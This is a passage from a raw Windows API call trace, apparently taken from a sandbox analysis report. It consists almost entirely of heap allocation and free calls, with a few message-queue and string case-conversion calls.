lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0269.405] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x180) returned 0x2e558d8 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0269.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.406] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55a60 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55be8 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0269.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a60 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55be8 | out: hHeap=0x970000) returned 1 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ef8 [0269.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55a60 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a60 | out: hHeap=0x970000) returned 1 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x9787b0 [0269.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52360 [0269.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52270 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521c8 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523c0 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523c0 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521c8 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52270 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52390 [0269.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52450 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52318 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52450 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522a0 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52438 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521f8 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52438 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521f8 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52330 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52318 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52330 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52378 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522b8 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52378 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522b8 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523c0 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523d8 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523c0 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523d8 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522a0 | out: hHeap=0x970000) returned 1 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52210 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52210 | out: hHeap=0x970000) returned 1 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 